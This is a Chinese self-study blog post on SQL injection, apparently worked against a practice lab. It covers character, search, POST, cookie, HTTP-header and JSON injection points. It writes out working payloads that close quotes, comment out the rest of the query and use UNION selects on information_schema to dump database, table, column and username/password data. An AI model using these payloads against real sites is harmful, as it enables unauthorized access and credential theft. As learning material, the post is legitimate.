<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="Web漏洞-SQL注入之类型及提交注入, 网安">
    <meta name="description" content="SQL注入之类型及提交注入1.参数类型数字   字符  搜索  JSON
2.字符当  id&amp;#x3D;1时   会显示以下
、
如果更改条件   将id&amp;#x3D;1 改为  username&amp;#x3D;username1   就会报错
">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="referrer" content="no-referrer-when-downgrade">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>Web漏洞-SQL注入之类型及提交注入 | 数字防线手记</title>
    <link rel="icon" type="image/png" href="/favicon.png">
    


    <!-- bg-cover style     -->



<link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.min.css">
<link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
<link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
<link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
<link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
<link rel="stylesheet" type="text/css" href="/css/matery.css">
<link rel="stylesheet" type="text/css" href="/css/my.css">
<link rel="stylesheet" type="text/css" href="/css/dark.css" media="none" onload="if(media!='all')media='all'">




    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
    <link rel="stylesheet" href="/css/post.css">




    



    <script src="/libs/jquery/jquery-3.6.0.min.js"></script>

<meta name="generator" content="Hexo 8.1.1"></head>


<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">数字防线手记</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="https://muziyueheng.github.io" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>首页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>分类</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
  <li>
    <a href="javascript:;" class="waves-effect waves-light" onclick="switchNightMode()" title="深色/浅色模式" >
      <i id="sum-moon-icon" class="fas fa-sun" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">数字防线手记</div>
        <div class="logo-desc">
            
            这是小编在自学网络安全时做的笔记，一是为了自己可以反复回顾当时的笔记，二是为了去与广大爱好者去交流学习补充自己的不足
            
        </div>
    </div>

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="https://muziyueheng.github.io" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			首页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			分类
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			关于
		</a>
          
        </li>
        
        
    </ul>
</div>


        </div>

        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('/medias/featureimages/9.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">Web漏洞-SQL注入之类型及提交注入</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/SQL/">
                                <span class="chip bg-color">SQL</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                    <div class="post-cate">
                        <i class="fas fa-bookmark fa-fw icon-category"></i>
                        
                            <a href="/categories/Web%E6%BC%8F%E6%B4%9E/" class="post-category">
                                Web漏洞
                            </a>
                        
                    </div>
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2026-04-10
                </div>
                

                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-check fa-fw"></i>更新日期:&nbsp;&nbsp;
                    2026-04-10
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-file-word fa-fw"></i>文章字数:&nbsp;&nbsp;
                    1k
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-clock fa-fw"></i>阅读时长:&nbsp;&nbsp;
                    4 分
                </div>
                

                
                    <div id="busuanzi_container_page_pv" class="info-break-policy">
                        <i class="far fa-eye fa-fw"></i>阅读次数:&nbsp;&nbsp;
                        <span id="busuanzi_value_page_pv"></span>
                    </div>
				
            </div>
        </div>
        <hr class="clearfix">

        

        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <h1 id="SQL注入之类型及提交注入"><a href="#SQL注入之类型及提交注入" class="headerlink" title="SQL注入之类型及提交注入"></a>SQL注入之类型及提交注入</h1><h3 id="1-参数类型"><a href="#1-参数类型" class="headerlink" title="1.参数类型"></a>1.参数类型</h3><p>数字   字符  搜索  JSON</p>
<h3 id="2-字符"><a href="#2-字符" class="headerlink" title="2.字符"></a>2.字符</h3><p>当  id&#x3D;1时   会显示以下</p>
<p><img src="https://muziyueheng.oss-cn-zhangjiakou.aliyuncs.com/image-20251010204713782.png" alt="image-20251010204713782">、</p>
<p>如果更改条件   将id&#x3D;1 改为  username&#x3D;username1   就会报错</p>
<p><img src="https://muziyueheng.oss-cn-zhangjiakou.aliyuncs.com/image-20251010204843214.png" alt="image-20251010204843214"></p>
<p>这是因为 username&#x3D;username1    的username1不是内置语句和函数  所以才会报错</p>
<p>这时候就需要把他括起来  使用单引号      如以下  就会正常显示</p>
<p><img src="https://muziyueheng.oss-cn-zhangjiakou.aliyuncs.com/image-20251010205146404.png" alt="image-20251010205146404"></p>
<p><img src="https://muziyueheng.oss-cn-zhangjiakou.aliyuncs.com/image-20251010210738553.png" alt="image-20251010210738553"></p>
<h3 id="3-搜索"><a href="#3-搜索" class="headerlink" title="3.搜索"></a>3.搜索</h3><p><img src="https://muziyueheng.oss-cn-zhangjiakou.aliyuncs.com/image-20251010211943603.png" alt="image-20251010211943603"></p>
<p>在搜索的时候  也会多出两个%%   使用就需要过滤掉单引号和%   不然  语句都在里面（不是唯一，，也可能是其他的符号，这时候就多进行尝试）</p>
<h3 id="4-请求方法"><a href="#4-请求方法" class="headerlink" title="4.请求方法"></a>4.请求方法</h3><p>GET POST REQUEST 等</p>
<p>查看方式</p>
<p><img src="https://muziyueheng.oss-cn-zhangjiakou.aliyuncs.com/image-20251010212438806.png" alt="image-20251010212438806"></p>
<p>不同的请求方式，它请求的数据类型或者大小都不同。一般大数据会采用POST提交</p>
<p>GET 参数会附加在url后面</p>
<p>POST 参数包含在请求体中</p>
<h3 id="5-参数字符型注入测试"><a href="#5-参数字符型注入测试" class="headerlink" title="5.参数字符型注入测试"></a>5.参数字符型注入测试</h3><p>示例一</p>
<p>在使用 and 1&#x3D;2时   这时页面依然正常</p>
<p><img src="https://muziyueheng.oss-cn-zhangjiakou.aliyuncs.com/image-20251011155926461.png" alt="image-20251011155926461"></p>
<p>查看源代码之后发现 $id  是在单引号中  所以 and 1&#x3D;1 是在单引号中</p>
<p><img src="https://muziyueheng.oss-cn-zhangjiakou.aliyuncs.com/image-20251011160154386.png" alt="image-20251011160154386"></p>
<p>可以在?id&#x3D;1后加一个单引号把源代码中原本存在的单引号闭合掉 这样就会正常报错</p>
<p><img src="https://muziyueheng.oss-cn-zhangjiakou.aliyuncs.com/image-20251011160523661.png" alt="image-20251011160523661"></p>
<p><img src="https://muziyueheng.oss-cn-zhangjiakou.aliyuncs.com/image-20251011161222748.png" alt="image-20251011161222748"></p>
<p>所以在进行注入的时候要输入?id&#x3D;1’ and ‘1’&#x3D;’1</p>
<p>显示正常</p>
<p><img src="https://muziyueheng.oss-cn-zhangjiakou.aliyuncs.com/image-20251011161341689.png" alt="image-20251011161341689"></p>
<p>?id&#x3D;1’ and ‘1’&#x3D;’1</p>
<p>不正常  有注入 </p>
<p><img src="https://muziyueheng.oss-cn-zhangjiakou.aliyuncs.com/image-20251011161402710.png" alt="image-20251011161402710"></p>
<h3 id="示例二"><a href="#示例二" class="headerlink" title="示例二"></a>示例二</h3><p><img src="https://muziyueheng.oss-cn-zhangjiakou.aliyuncs.com/image-20251011162018424.png" alt="image-20251011162018424"></p>
<p>$id &#x3D; ‘“‘.$id.’”‘其中出现单引号和双引号</p>
<p>所以  也可以使用使用双引号去查看源代码中是否有双引号</p>
<p>加了双引号之后发现报错  说明是存在双引号的</p>
<p>显示正常</p>
<p><img src="https://muziyueheng.oss-cn-zhangjiakou.aliyuncs.com/image-20251011163002958.png" alt="image-20251011163002958"></p>
<p>显示不正常</p>
<p><img src="https://muziyueheng.oss-cn-zhangjiakou.aliyuncs.com/image-20251011163044867.png" alt="image-20251011163044867"></p>
<p>这里可以使用–+把源代码中的后面双引号的内容注释掉</p>
<p><img src="https://muziyueheng.oss-cn-zhangjiakou.aliyuncs.com/image-20251011163221688.png" alt="image-20251011163221688"></p>
<p><img src="https://muziyueheng.oss-cn-zhangjiakou.aliyuncs.com/image-20251011163358477.png" alt="image-20251011163358477"></p>
<h3 id="6-POST数据提交注入测试"><a href="#6-POST数据提交注入测试" class="headerlink" title="6.POST数据提交注入测试"></a>6.POST数据提交注入测试</h3><p>一般存在于登录框</p>
<p>要注意注意提交方式，参数类型。</p>
<p>使用抓包工具     </p>
<p><img src="https://muziyueheng.oss-cn-zhangjiakou.aliyuncs.com/image-20251011205219342.png" alt="image-20251011205219342"></p>
<p>在这个窗口下对此语句进行post注入</p>
<p><img src="https://muziyueheng.oss-cn-zhangjiakou.aliyuncs.com/image-20251011205352018.png" alt="image-20251011205352018"></p>
<p>查看该语句源代码中是否存在单引号等</p>
<p>uname&#x3D;admin and 1&#x3D;2&amp;passwd&#x3D;admin&amp;submit&#x3D;Submit</p>
<p>发现依然显示正常  说明是存在数字类型的</p>
<p><img src="https://muziyueheng.oss-cn-zhangjiakou.aliyuncs.com/image-20251011205714973.png" alt="image-20251011205714973"></p>
<p>加上单引号</p>
<p>uname&#x3D;admin‘ and 1&#x3D;2&amp;passwd&#x3D;admin&amp;submit&#x3D;Submit</p>
<p>报错了 </p>
<p><img src="https://muziyueheng.oss-cn-zhangjiakou.aliyuncs.com/image-20251011205522989.png" alt="image-20251011205522989"></p>
<p>那么这时候就开始进行注入</p>
<p>uname&#x3D;admin’ and 1&#x3D;2 union select 1,2 #&amp;passwd&#x3D;admin&amp;submit&#x3D;Submit  （#是注释后面的语句 和–+一样的意思）</p>
<p><img src="https://muziyueheng.oss-cn-zhangjiakou.aliyuncs.com/image-20251011210230863.png" alt="image-20251011210230863"></p>
<p>uname&#x3D;admin’ and 1&#x3D;2 union select database(),2 –+&amp;passwd&#x3D;admin&amp;submit&#x3D;Submit</p>
<p>获得库名security</p>
<img src="https://muziyueheng.oss-cn-zhangjiakou.aliyuncs.com/image-20251011210426028.png" alt="image-20251011210426028" style="zoom:200%;" />

<p>uname&#x3D;admin’ and 1&#x3D;2 union select table_name,2 from information_schema.tables where table_schema&#x3D;’security’ #&amp;passwd&#x3D;admin&amp;submit&#x3D;Submit   获得表名 users</p>
<p><img src="https://muziyueheng.oss-cn-zhangjiakou.aliyuncs.com/image-20251011211450685.png" alt="image-20251011211450685"></p>
<p>uname&#x3D;admin’ and 1&#x3D;2 union select group_concat(column_name),2 from information_schema.columns where table_name&#x3D;’users’ #&amp;passwd&#x3D;admin&amp;submit&#x3D;Submit</p>
<p>获取所有列名 </p>
<p><img src="https://muziyueheng.oss-cn-zhangjiakou.aliyuncs.com/image-20251011212120569.png" alt="image-20251011212120569"></p>
<p>uname&#x3D;admin’ and 1&#x3D;2 union select username,password from security.users #&amp;passwd&#x3D;admin&amp;submit&#x3D;Submit</p>
<p>由此可获得数据</p>
<p><img src="https://muziyueheng.oss-cn-zhangjiakou.aliyuncs.com/image-20251011212543701.png" alt="image-20251011212543701"></p>
<h3 id="7-cookie数据提交注入测试"><a href="#7-cookie数据提交注入测试" class="headerlink" title="7.cookie数据提交注入测试"></a>7.cookie数据提交注入测试</h3><p>uname&#x3D;at’ and 1&#x3D;2 union select 1,2,3#&amp;passwd&#x3D;at&amp;submit&#x3D;Submit</p>
<p>在使用注入语句时  发现注入后 语句发生变化  再查看源码</p>
<p><img src="https://muziyueheng.oss-cn-zhangjiakou.aliyuncs.com/image-20251011221559248.png" alt="image-20251011221559248"></p>
<p><img src="https://muziyueheng.oss-cn-zhangjiakou.aliyuncs.com/image-20251011221617237.png" alt="image-20251011221617237"></p>
<p>再查看源码</p>
<p>发现了魔术开关</p>
<p>把一些语句进行了过滤</p>
<p><img src="https://muziyueheng.oss-cn-zhangjiakou.aliyuncs.com/image-20251011221657931.png" alt="image-20251011221657931"></p>
<p>那么  这时候可以使用cookie注入  可以绕过一些过滤防护</p>
<p>如果POST无法返回数据  那就将POST改为GET</p>
<p>再在数据包中添加一条 Cookie:uname&#x3D;at’ and 1&#x3D;2 union select 1,2,3#</p>
<p>则可以返回相关数据</p>
<p><img src="https://muziyueheng.oss-cn-zhangjiakou.aliyuncs.com/image-20251011223340559.png" alt="image-20251011223340559"></p>
<p><img src="https://muziyueheng.oss-cn-zhangjiakou.aliyuncs.com/image-20251011223318749.png" alt="image-20251011223318749"></p>
<p>接下来   便可进行注入</p>
<h3 id="8-HTTP"><a href="#8-HTTP" class="headerlink" title="8.HTTP"></a>8.HTTP</h3><p>在打开的页面中会出现我的IP地址</p>
<p>就是$IP &#x3D; $_SERVER[‘REMOTE_ADDR’];这天语句的作用</p>
<p><img src="https://muziyueheng.oss-cn-zhangjiakou.aliyuncs.com/image-20251011224143750.png" alt="image-20251011224143750"></p>
<p><img src="https://muziyueheng.oss-cn-zhangjiakou.aliyuncs.com/image-20251011224128989.png" alt="image-20251011224128989"></p>
<p>依然存在过滤函数</p>
<p>也存在POST    所以在登录框中存在过滤</p>
<p><img src="https://muziyueheng.oss-cn-zhangjiakou.aliyuncs.com/image-20251011224427775.png" alt="image-20251011224427775"></p>
<p>该语句是insert 插入语句   （insert 注入）</p>
<p><img src="https://muziyueheng.oss-cn-zhangjiakou.aliyuncs.com/image-20251011224558312.png" alt="image-20251011224558312"></p>
<p>对于此类注入要在这里做文章<img src="https://muziyueheng.oss-cn-zhangjiakou.aliyuncs.com/image-20251011225809882.png" alt="image-20251011225809882"></p>
<h3 id="9-JSON"><a href="#9-JSON" class="headerlink" title="9.JSON"></a>9.JSON</h3><p>其格式是列表形式   在进行注入的时候也要按照类似格式写在相应的地方</p>
<p>经常出现在app中</p>
<p><img src="https://muziyueheng.oss-cn-zhangjiakou.aliyuncs.com/image-20251011230617039.png" alt="image-20251011230617039"></p>

                
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">月恒</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="https://muziyueheng.github.io/2026/04/10/Web%E6%BC%8F%E6%B4%9E-SQL%E6%B3%A8%E5%85%A5%E4%B9%8B%E7%B1%BB%E5%9E%8B%E5%8F%8A%E6%8F%90%E4%BA%A4%E6%B3%A8%E5%85%A5/">https://muziyueheng.github.io/2026/04/10/Web%E6%BC%8F%E6%B4%9E-SQL%E6%B3%A8%E5%85%A5%E4%B9%8B%E7%B1%BB%E5%9E%8B%E5%8F%8A%E6%8F%90%E4%BA%A4%E6%B3%A8%E5%85%A5/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="/about" target="_blank">月恒</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/SQL/">
                                    <span class="chip bg-color">SQL</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="google,qq,wechat" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
        </div>
    </div>

    

    

    

    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fas fa-chevron-left"></i>&nbsp;上一篇</div>
            <div class="card">
                <a href="/2026/04/10/Burp-suite%E4%B8%8B%E8%BD%BD/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/3.jpg" class="responsive-img" alt="Burp suite下载">
                        
                        <span class="card-title">Burp suite下载</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="far fa-clock fa-fw icon-date"></i>2026-04-10
                        </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/%E5%B7%A5%E5%85%B7/" class="post-category">
                                    工具
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/Burp/">
                        <span class="chip bg-color">Burp</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2026/04/10/Web%E6%BC%8F%E6%B4%9E-SQL%E6%B3%A8%E5%85%A5%E4%B9%8BMYSQL%E6%B3%A8%E5%85%A5/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/5.jpg" class="responsive-img" alt="Web漏洞-SQL注入之MYSQL注入">
                        
                        <span class="card-title">Web漏洞-SQL注入之MYSQL注入</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2026-04-10
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/Web%E6%BC%8F%E6%B4%9E/" class="post-category">
                                    Web漏洞
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/SQL/">
                        <span class="chip bg-color">SQL</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>



<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>



<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>



    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget card" style="background-color: white;">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>
<!-- 我的资料卡片（左边悬浮效果） -->

<div id="myinfo-aside" class="col l3 hide-on-med-and-down" style="margin-top: 40px;">
    <div class="myinfo-widget card" style="background-color: white;">
        <div class="card-content">
            <div class="center-align">
                <!-- 头像 -->
                <img src="/medias/logo.png" 
                     style="width: 80px; height: 80px; border-radius: 50%; object-fit: cover; margin-bottom: 10px;">
                
                <!-- 姓名 -->
                <div style="font-size: 18px; font-weight: 600; margin-bottom: 15px; color: #0e9e9e;">
                    月恒
                </div>
                
                <!-- QQ -->
                
                    <div style="margin: 8px 0; text-align: left; font-size: 14px;">
                        <i class="fab fa-qq" style="width: 25px; color: #12B7F5;"></i>
                        <span style="margin-left: 5px;">1761442677</span>
                    </div>
                
                
                <!-- 邮箱 -->
                
                    <div style="margin: 8px 0; text-align: left; font-size: 14px;">
                        <i class="fas fa-envelope" style="width: 25px; color: #FFA500;"></i>
                        <span style="margin-left: 5px;">1761442677@qq.com</span>
                    </div>
                
            </div>
        </div>
    </div>
</div>

<script>
$(function () {
    let myinfoHeight = parseInt($(window).height() * 0.4 - 64);
    let $myinfoWidget = $('.myinfo-widget');
    
    $(window).scroll(function () {
        let scroll = $(window).scrollTop();
        if (scroll > myinfoHeight) {
            $myinfoWidget.addClass('myinfo-fixed');
        } else {
            $myinfoWidget.removeClass('myinfo-fixed');
        }
    });
});
</script>

<style>
.myinfo-fixed {
    position: fixed;
    top: 50px;
    left: 20px;  /* 距离左边 20px */
    width: 262px;
    z-index: 999;
    background-color: white !important;
}
</style>

<style>
/* 资料卡片左边悬浮样式 */
.myinfo-widget {
    transition: all 0.3s ease;
}

.myinfo-fixed {
    position: fixed;
    top: 20px;
    width: 262px;  /* 和目录卡片宽度一致 */
    z-index: 999;
    background-color: white !important;
}

/* 响应式：屏幕变窄时取消固定 */
@media only screen and (max-width: 992px) {
    .myinfo-fixed {
        position: relative;
        top: auto;
        left: auto !important;
        width: auto;
    }
}
</style>


<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h2, h3, h4'
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    

    <div class="container row center-align"
         style="margin-bottom: 0px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            
                <span id="year">2019-2026</span>
            
            <a href="/about" target="_blank">月恒</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            
            <br>
            
                &nbsp;<i class="fas fa-chart-area"></i>&nbsp;站点总字数:&nbsp;<span
                        class="white-color">5.6k</span>
            
            
            
                
            
            
                <span id="busuanzi_container_site_pv">
                &nbsp;|&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;
                    <span id="busuanzi_value_site_pv" class="white-color"></span>
            </span>
            
            
                <span id="busuanzi_container_site_uv">
                &nbsp;|&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;
                    <span id="busuanzi_value_site_uv" class="white-color"></span>
            </span>
            
            <br>

            <!-- 运行天数提醒. -->
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">
    <a href="https://github.com/muziyueheng/muziyueheng.github.io" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fab fa-github"></i>
    </a>



    <a href="mailto:1761442677@qq.com" class="tooltipped" target="_blank" data-tooltip="邮件联系我" data-position="top" data-delay="50">
        <i class="fas fa-envelope-open"></i>
    </a>







    <a href="tencent://AddContact/?fromId=50&fromSubId=1&subcmd=all&uin=1761442677" class="tooltipped" target="_blank" data-tooltip="QQ联系我: 1761442677" data-position="top" data-delay="50">
        <i class="fab fa-qq"></i>
    </a>







</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script type="text/javascript">
$(function () {
    var searchFunc = function (path, search_id, content_id) {
        'use strict';
        $.ajax({
            url: path,
            dataType: "xml",
            success: function (xmlResponse) {
                // get the contents from search data
                var datas = $("entry", xmlResponse).map(function () {
                    return {
                        title: $("title", this).text(),
                        content: $("content", this).text(),
                        url: $("url", this).text()
                    };
                }).get();
                var $input = document.getElementById(search_id);
                var $resultContent = document.getElementById(content_id);
                $input.addEventListener('input', function () {
                    var str = '<ul class=\"search-result-list\">';
                    var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                    $resultContent.innerHTML = "";
                    if (this.value.trim().length <= 0) {
                        return;
                    }
                    // perform local searching
                    datas.forEach(function (data) {
                        var isMatch = true;
                        var data_title = data.title.trim().toLowerCase();
                        var data_content = data.content.trim().replace(/<[^>]+>/g, "").toLowerCase();
                        var data_url = data.url;
                        data_url = data_url.indexOf('/') === 0 ? data.url : '/' + data_url;
                        var index_title = -1;
                        var index_content = -1;
                        var first_occur = -1;
                        // only match artiles with not empty titles and contents
                        if (data_title !== '' && data_content !== '') {
                            keywords.forEach(function (keyword, i) {
                                index_title = data_title.indexOf(keyword);
                                index_content = data_content.indexOf(keyword);
                                if (index_title < 0 && index_content < 0) {
                                    isMatch = false;
                                } else {
                                    if (index_content < 0) {
                                        index_content = 0;
                                    }
                                    if (i === 0) {
                                        first_occur = index_content;
                                    }
                                }
                            });
                        }
                        // show search results
                        if (isMatch) {
                            str += "<li><a href='" + data_url + "' class='search-result-title'>" + data_title + "</a>";
